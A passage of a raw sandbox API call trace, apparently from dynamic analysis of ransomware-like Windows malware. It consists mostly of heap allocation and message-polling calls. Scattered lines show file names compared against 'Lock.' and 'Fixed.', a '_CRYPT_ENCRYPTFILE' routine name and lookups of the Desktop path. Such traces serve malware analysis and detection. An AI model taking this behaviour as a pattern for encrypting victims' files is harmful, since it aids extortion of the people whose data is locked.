| out: lpMsg=0x8cf968) returned 0 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0137.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0137.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aycVRCc36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ycVRCc36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cVRCc36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VRCc36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RCc36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cc36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="36.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0137.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6.ppt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0137.520] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0137.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0137.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aycVRCc36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ycVRCc36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cVRCc36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VRCc36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RCc36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cc36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0137.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="36.ppt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0137.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0137.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0137.522] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0137.522] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0137.522] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0137.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.523] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53728 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0137.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0137.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0137.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0137.524] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0137.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0137.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0137.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0137.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0137.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0137.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0137.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0137.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0137.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0137.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0137.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0137.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0137.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.527] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0137.527] HeapFree (in: 